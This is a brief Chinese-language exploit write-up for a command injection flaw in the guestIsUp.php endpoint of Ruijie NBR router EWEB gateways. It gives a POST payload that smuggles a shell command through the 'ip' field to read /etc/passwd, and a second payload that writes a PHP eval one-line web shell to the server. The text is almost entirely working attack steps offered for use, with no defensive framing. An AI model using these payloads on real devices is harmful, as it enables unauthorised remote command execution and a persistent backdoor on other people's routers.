锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取
URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。
我们打开hacker Bar,在Post data 输入 mac=1&ip=192.168.1.1|cat /etc/passwd > test.txt
利用此漏洞我们可以将一句话木马写入shell
Payload :
mac=1&ip=192.168.1.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > shell.php